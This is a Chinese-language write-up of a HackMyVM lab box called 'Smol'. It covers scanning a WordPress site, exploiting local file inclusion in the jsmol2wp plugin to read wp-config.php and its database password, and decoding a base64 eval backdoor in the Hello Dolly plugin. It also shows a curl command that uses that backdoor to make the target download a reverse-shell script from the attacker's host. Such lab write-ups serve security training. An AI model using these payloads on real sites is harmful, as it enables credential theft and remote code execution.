Smol
信息搜集
端口扫描
┌──(kali💀kali)-[~/temp/Smol]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Open 192.168.10.100:22
Open 192.168.10.100:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+/gIThU4ODr/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF/gS3jP/fVw+H6Eyz/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
| 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://www.smol.hmv
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
发现了一个域名解析,添加一下:
192.168.10.100 www.smol.hmv
目录扫描
┌──(kali💀kali)-[~/temp/Smol]
└─$ feroxbuster -u http://smol.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php txt html -s 200 301 302 -d 1
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://smol.hmv
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, html]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 1
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 0l 0w 0c http://smol.hmv/ => http://www.smol.hmv/
301 GET 0l 0w 0c http://smol.hmv/index.php => http://www.smol.hmv/
301 GET 9l 28w 309c http://smol.hmv/wp-content => http://smol.hmv/wp-content/
200 GET 81l 274w 4537c http://smol.hmv/wp-login.php
200 GET 384l 3177w 19903c http://smol.hmv/license.txt
301 GET 9l 28w 310c http://smol.hmv/wp-includes => http://smol.hmv/wp-includes/
200 GET 394l 768w 6125c http://smol.hmv/wp-admin/css/install.css
200 GET 13l 78w 4373c http://smol.hmv/wp-admin/images/wordpress-logo.png
200 GET 23l 81w 1259c http://smol.hmv/wp-admin/upgrade.php
302 GET 0l 0w 0c http://smol.hmv/wp-admin/ => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2F&reauth=1
302 GET 0l 0w 0c http://smol.hmv/wp-admin/import.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fimport.php&reauth=1
302 GET 0l 0w 0c http://smol.hmv/wp-admin/update-core.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fupdate-core.php&reauth=1
200 GET 17l 82w 1261c http://smol.hmv/wp-admin/install.php
200 GET 98l 836w 7425c http://smol.hmv/readme.html
200 GET 5l 15w 135c http://smol.hmv/wp-trackback.php
301 GET 9l 28w 307c http://smol.hmv/wp-admin => http://smol.hmv/wp-admin/
302 GET 0l 0w 0c http://smol.hmv/wp-signup.php => http://www.smol.hmv/wp-login.php?action=register
[#######>------------] - 3m 319651/882248 5m found:17 errors:0
[####################] - 8m 882248/882248 0s found:17 errors:0
[####################] - 8m 882184/882184 1953/s http://smol.hmv/
博客扫描
看上去是一个wordpress,尝试进行扫描:
┌──(kali💀kali)-[~/temp/Smol]
└─$ cmseek -u http://www.smol.hmv -v
[i] Updating CMSeeK result index...
[*] Report index updated successfully!
___ _ _ ____ ____ ____ _ _
| |\/| [__ |___ |___ |_/ by @r3dhax0r
|___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA
[+] CMS Detection And Deep Scan [+]
[i] Scanning Site: http://www.smol.hmv
[+] User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
[+] Collecting Headers and Page Source for Analysis
[+] Detection Started
[+] Using headers to detect CMS (Stage 1 of 4)
[*] CMS Detected, CMS ID: wp, Detection method: header
[+] Getting CMS info from database
[+] Starting WordPress DeepScan
[+] Detecting Version and vulnerabilities
[+] Generator Tag Available... Trying version detection using generator meta tag
[*] Version Detected, WordPress Version 6.8.1
[+] Initiating open directory and files check
[+] XML-RPC interface not available
[+] Looking for potential path disclosure
[i] Checking user registration status
[i] Starting passive plugin enumeration
[*] 1 Plugin enumerated!
[i] Starting passive theme enumeration
[+] Looking for theme zip file!
[*] 1 theme detected!
[i] Starting Username Harvest
[i] Harvesting usernames from wp-json api
[!] Json api method failed trying with next
[i] Harvesting usernames from jetpack public api
[!] No results from jetpack api... maybe the site doesn't use jetpack
[i] Harvesting usernames from wordpress author Parameter
[*] Found user from source code: xavi
[*] Found user from source code: diego
[*] Found user from source code: gege
[*] Found user from redirection: admin
[*] Found user from redirection: think
[*] Found user from redirection: wp
[*] 6 Usernames were enumerated
[i] Checking version vulnerabilities using wpvulns.com
[x] Error Retriving data from wpvulndb
___ _ _ ____ ____ ____ _ _
| |\/| [__ |___ |___ |_/ by @r3dhax0r
|___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA
[+] Deep Scan Results [+]
┏━Target: www.smol.hmv
┃
┠── CMS: WordPress
┃ │
┃ ├── Version: 6.8.1
┃ ╰── URL: https://wordpress.org
┃
┠──[WordPress Deepscan]
┃ │
┃ ├── Readme file found: http://www.smol.hmv/readme.html
┃ ├── License file: http://www.smol.hmv/license.txt
┃ ├── Uploads directory has listing enabled: http://www.smol.hmv/wp-content/uploads
┃ │
┃ ├── Plugins Enumerated: 1
┃ │ │
┃ │ ╰── Plugin: jsmol2wp
┃ │ │
┃ │ ├── Version: 14.1.7
┃ │ ╰── URL: http://www.smol.hmv/wp-content/plugins/jsmol2wp
┃ │
┃ │
┃ ├── Themes Enumerated: 1
┃ │ │
┃ │ ╰── Theme: popularfx
┃ │ │
┃ │ ├── Version: 1.2.5
┃ │ ╰── URL: http://www.smol.hmv/wp-content/themes/popularfx
┃ │
┃ │
┃ ├── Usernames harvested: 6
┃ │ │
┃ │ ├── wp
┃ │ ├── think
┃ │ ├── diego
┃ │ ├── gege
┃ │ ├── xavi
┃ │ ╰── admin
┃ │
┃
┠── Result: /home/kali/temp/Smol/Result/www.smol.hmv/cms.json
┃
┗━Scan Completed in 0.88 Seconds, using 45 Requests
CMSeeK says ~ addio
漏洞发现
信息搜集
发现了若干用户以及一个插件jsmol2wp
,简单看一下发现不存在相关漏洞,使用wpscan扫描一下:
┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan --url http://www.smol.hmv --api-token xxxxxxxxxxxxxxxxxxx
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://www.smol.hmv/ [192.168.10.100]
[+] Started: Fri Jun 6 22:30:50 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://www.smol.hmv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:03 <============================================================================================================> (702 / 702) 100.00% Time: 00:00:03[i] The WordPress version could not be detected.
[+] WordPress theme in use: popularfx
| Location: http://www.smol.hmv/wp-content/themes/popularfx/
| Last Updated: 2024-11-19T00:00:00.000Z
| Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt
| [!] The version is out of date, the latest version is 1.2.6
| Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5
| Style Name: PopularFX
| Style URI: https://popularfx.com
| Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...
| Author: Pagelayer
| Author URI: https://pagelayer.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 0
| Requests Remaining: 23
[+] Finished: Fri Jun 6 22:30:58 2025
[+] Requests Done: 706
[+] Cached Requests: 609
[+] Data Sent: 191.137 KB
[+] Data Received: 179.346 KB
[+] Memory used: 248.938 MB
[+] Elapsed time: 00:00:07
Scan Aborted: wrong constant name
version_finder_module.const_set(constant_name, Module.new)
^^^^^^^^^^
Trace: /usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `const_set'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `maybe_create_module'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:83:in `create_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:23:in `create_and_load_dynamic_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:16:in `initialize'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `new'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `find'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/models/plugin.rb:34:in `version'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `each'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `enum_plugins'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration.rb:13:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `each'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `block in run'
/usr/lib/ruby/3.1.0/timeout.rb:84:in `timeout'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:45:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:24:in `run'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:17:in `block in <top (required)>'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:15:in `initialize'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `new'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `<top (required)>'
/usr/bin/wpscan:25:in `load'
/usr/bin/wpscan:25:in `<main>'
报错处理
出现了奇怪的报错,但是我不知道这个报错该咋解决,尝试升级一下:
┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo apt-get update && sudo apt-get upgrade
# sudo apt autoremove
但是升级完以后出现了新的报错:
┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan
/usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1421:in `block in activate_dependencies': Could not find 'opt_parse_validator' (~> 1.9.5) among 159 total gem(s) (Gem::MissingSpecError)
Checked in 'GEM_PATH=/home/kali/.local/share/gem/ruby/3.1.0:/var/lib/gems/3.1.0:/usr/local/lib/ruby/gems/3.1.0:/usr/lib/ruby/gems/3.1.0:/usr/lib/x86_64-linux-gnu/ruby/gems/3.1.0:/usr/share/rubygems-integration/3.1.0:/usr/share/rubygems-integration/all:/usr/lib/x86_64-linux-gnu/rubygems-integration/3.1.0' at: /usr/share/rubygems-integration/all/specifications/cms_scanner-0.13.9.gemspec, execute `gem env` for more information
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1423:in `block in activate_dependencies'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
from /usr/lib/ruby/vendor_ruby/rubygems.rb:290:in `block in activate_bin_path'
from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `synchronize'
from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `activate_bin_path'
from /usr/bin/wpscan:25:in `<main>'
尝试解决,在github发现了一个大佬的解决方案:
https://github.com/wpscanteam/wpscan/issues/1243#issuecomment-489421054
Resolved the same issue. In my fix, I did NOT uninstall anything.
apt-get install ruby-dev
gem install ffi --platform=ruby
gem install yajl-ruby
apt-get install libxslt-dev libxml2-dev
gem install nokogiri -- --use-system-librariesThen wpscan worked.
但是并未完全解决,不慌,回头换个kali
插件漏洞利用
尝试google一下插件的相关漏洞,先看一下版本吧:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/ | html2text
****** Index of /wp-content/plugins/jsmol2wp ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] JSmol.min.js 2023-08-16 20:24 224K
[[ ]] JSmol.min.nojq.js 2023-08-16 20:24 129K
[[ ]] add-textdomain.php 2023-08-16 20:24 4.6K
[[ ]] class.jsMol2wp.php 2023-08-16 20:24 9.8K
[[DIR]] css/ 2023-08-16 20:22 -
[[TXT]] help.htm 2023-08-16 20:24 9.0K
[[DIR]] idioma/ 2023-08-16 20:22 -
[[DIR]] images/ 2023-08-16 20:22 -
[[DIR]] j2s/ 2023-08-16 20:22 -
[[ ]] jsmol2wp.php 2023-08-16 20:24 2.4K
[[TXT]] jsmol_template.htm 2023-08-16 20:24 2.0K
[[DIR]] php/ 2023-08-16 20:22 -
[[TXT]] readme.txt 2023-08-16 20:24 5.2K
[[TXT]] simple.htm 2023-08-16 20:24 6.3K
[[TXT]] updating_jsmol2wp.txt 2023-08-16 20:24 475
===========================================================================
Apache/2.4.41 (Ubuntu) Server at www.smol.hmv Port 80
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt | html2text
=== JSmol2WP === Contributors: Jim Hu Tags: shortcodes, JSmol, Jmol, molecular
graphics, PDB Requires at least: 3.0 Tested up to: 4.9.4 Donate link:http://
biochemistry.tamu.edu/index.php/alum/giving/ Stable tag: 1.07 License: GPLv2 or
later License URI: http://www.gnu.org/licenses/gpl-2.0.html Text domain:
jsmol2wp Domain path:/languages/ Plugin to place JSmol molecular graphics
applets in WordPress posts or pages. == Description == This shortcode plugin
places JSmol applets in WordPress posts and pages. Use [jsmol pdb='accession']
for a minimal version. jsmol2wp will look to see if a pdb file has been
uploaded to your wordpress and it will use that file if it can find it. If it
can't find a matching post for an uploaded attachement, it will try http://
rcsb.org/pdb. If it can't find a match there either, you'll get an error
message in the JSmol window. Additional information on optional parameters are
at the About/Help link in the applets. This plugin was developed for use on the
website for the Department of Biochemistry and Biophysics at Texas A&M
University (http://biochemistry.tamu.edu). == Installation == Place in the
plugins directory and activate. No additional files or configurations are
needed. Thanks to Bob Hanson and the JMol team for making the javascript code
for jsmol available. See: http://chemapps.stolaf.edu/jmol/jsmol http://
wiki.jmol.org/index.php/Jmol_JavaScript_Object This plugin also benefited from
using Jaime Prilusky's mediawiki extension for inspiration http://
proteopedia.org/support/JSmolExtension/ == Upgrade Notice == Version 1.03
updates the Jmol libraries and fixes a bug with the load parameter ==
Frequently Asked Questions == = Is there an example of an installation? = See
http://jimhu.org/jsmol2wp-plugin-released-at-wordpress-org/ = Where can I learn
more about what JSmol can do? = Jmol documentation can be found at http://
jmol.sourceforge.net/#Learn%20to%20use%20Jmol and http://jmol.sourceforge.net/
docs/JmolUserGuide/ == Screenshots == 1. Applet for a protein. 2. Applet for a
small molecule. == Changelog == = 1.07 = fix extremely stupid svn error where
needed files from the j2s directory were not in the repo = 1.06 = change rcsb
file path to avoid redirect = 1.05 = load rcsb pdb files via https instead of
http = 1.04 = * updated jsmol package from Jmol sourceforge * first attempt at
internationalization ** Added idioma directory from jsMol distributions **
Added set language directive based on wordpress get_locale() = 1.03 = * updated
jsmol package from Jmol sourceforge * Remove beta from help.htm * fix bug where
load param was not working = 1.02 = * fixes to this readme.txt file to improve
the display at the wordpress.org plugin repository = 1.01 = * tweaks for
wordpress.org deposition = 1.0 = * update JSmol code to 14.3.12_2015.01.28 *
prepare for release to wordpress.org plugin repository = 0.94 beta = * add
isosurface support * rewrite the code to set up structure loading * replace WP
get_page_by_title with a function that matches the filename * add jvxl to file
types * fixed bug where caption nonmatching required casting match as a string.
* move the help demo page to a more stable URL. = 0.93 beta = * set default
type based on fileurl extension if present * fix bug where reset button failed
with data from fileurl = 0.92 beta = * change appletID to not require $acc. =
0.9 beta = * improve help page * improve uniqueness identifiers for multiple
Jmolapplets on the same post/page; add the option to hand code instances *
improve debug messages (or at least change them) * make reset button standard
and have it remember the load commands * standard buttons depend on the type of
molecule loaded. * add some semicolons to the template to try to fix lint
warnings: http://www.javascriptlint.com/online_lint.php = 0.8 beta = * removed
data directory * changed system for counting instances of the shorttag so we
don't need preg_match * removed whitespace from template hoping that solves the
problem of themes adding markup * simplified load script as suggested by Bob
Hansen * made applet IDs more unique by appending post id = 0.7 beta = * update
jsmol libraries to 4.1.7_2014.06.09 * add dependencies for jquery-ui-core and
jquery-ui-menu fixes popup problem in some themes * refactor to support
additional file types (in progress) * fix multiline regex bug * fix bug that
caused failure to load when permalinks used ?p=post_number format * debug
constructor * debug view ..* add path to uploaded file ..* add test for
get_page_by_title = 0.6 alpha = * register script before enqueueing it. * added
ability to add Jmol.script commands * added the ability to add jmolCommandInput
= 0.5 alpha = * added wrap and debug options = 0.4 alpha = * changed to nojq. *
modified command processing to not split on allowed characters in Jmol syntax.
= 0.3 alpha = * changed default to spin off in order to save client cpu *
custom command buttons working. = 0.2 alpha = * changed system to use a
template based on the distro file simple1.htm. * added captioning * works with
local or remote pdb files from rcsb.org/pdb = 0.1 pre-alpha = * basic shortcode
working with uploaded pdb file * adds .pdb chemical/pdb mime type to allowed
mime types * handles multiple shortcodes on the same page
版本为1.07
,进行查询
发现存在一个文件包含漏洞,尝试查看进行利用:
{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
发现查到了:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
并包含用户凭证的泄露:
wpuser
kbLSF2Vop#lw3rjDZ629*Z%G
尝试进行登录,默认登录界面为http://www.smol.hmv/wp-admin
:
登录成功!然后找到了一些有效信息:
# Webmaster Tasks!! — Private
1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of "Hello Dolly" plugin as the site's code revision.
2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.
3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.
4- Strong Passwords: Enforce strong passwords for users and administrators.
5- Input Validation: Validate and sanitize user inputs to prevent attacks like SQL injection and XSS.
6- [IMPORTANT] Firewall Installation: Install a web application firewall (WAF) to filter incoming traffic.
7- Backup Strategy: Set up regular backups of your website and databases.
8- [IMPORTANT] User Permissions: Assign minimum necessary permissions to users based on roles.
9- Content Security Policy: Implement a CSP to control resource loading and prevent malicious scripts.
10- Secure File Uploads: Validate file types, use secure upload directories, and restrict execution permissions.
11- Regular Security Audits: Conduct routine security assessments, vulnerability scans, and penetration tests.
显示Hello Dolly
插件似乎存在一些漏洞利用,看一下源代码:
发现文件名称为hello.php
,利用文件包含漏洞查询一下这个文件的源码:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php"
<?php
/**
* @package Hello_Dolly
* @version 1.7.2
*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/
function hello_dolly_get_lyric() {
/** These are the lyrics to Hello Dolly */
$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";
// Here we split it into lines.
$lyrics = explode( "\n", $lyrics );
// And then randomly choose a line.
return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}
// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
$chosen = hello_dolly_get_lyric();
$lang = '';
if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
$lang = ' lang="en"';
}
printf(
'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
$lang,
$chosen
);
}
// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );
// We need some CSS to position the paragraph.
function dolly_css() {
echo "
<style type='text/css'>
#dolly {
float: right;
padding: 5px 10px;
margin: 0;
font-size: 12px;
line-height: 1.6666;
}
.rtl #dolly {
float: left;
}
.block-editor-page #dolly {
display: none;
}
@media screen and (max-width: 782px) {
#dolly,
.rtl #dolly {
float: none;
padding-left: 0;
padding-right: 0;
}
}
</style>
";
}
add_action( 'admin_head', 'dolly_css' );
解密一下这个base64
字符串:
┌──(kali💀kali)-[~/temp/Smol]
└─$ echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA" | base64 -d
if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }
里外俩看起来一样,查看一下:
┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\155\x64"
cmd
┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\x6d\144"
cmd
明显是一个后门,尝试进行利用弹一个shell:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/hello.php?cmd=wget+http://192.168.10.101:8888/revshell.sh+-O+/tmp/revshell.sh"
其他常见的命令都没有回显,不得不怀疑是否可以运行,再翻翻吧,发现好像是一个放歌的插件,且没啥用。。。。。
翻着翻着我找到了这个插件的启用位置:
每次开启后台会显示,看一下我们的那个后台是否存在这个,如果存在意味着在后台界面存在hello.php
的调用,即可尝试进行反弹shell:
找到了,八嘎!!!!
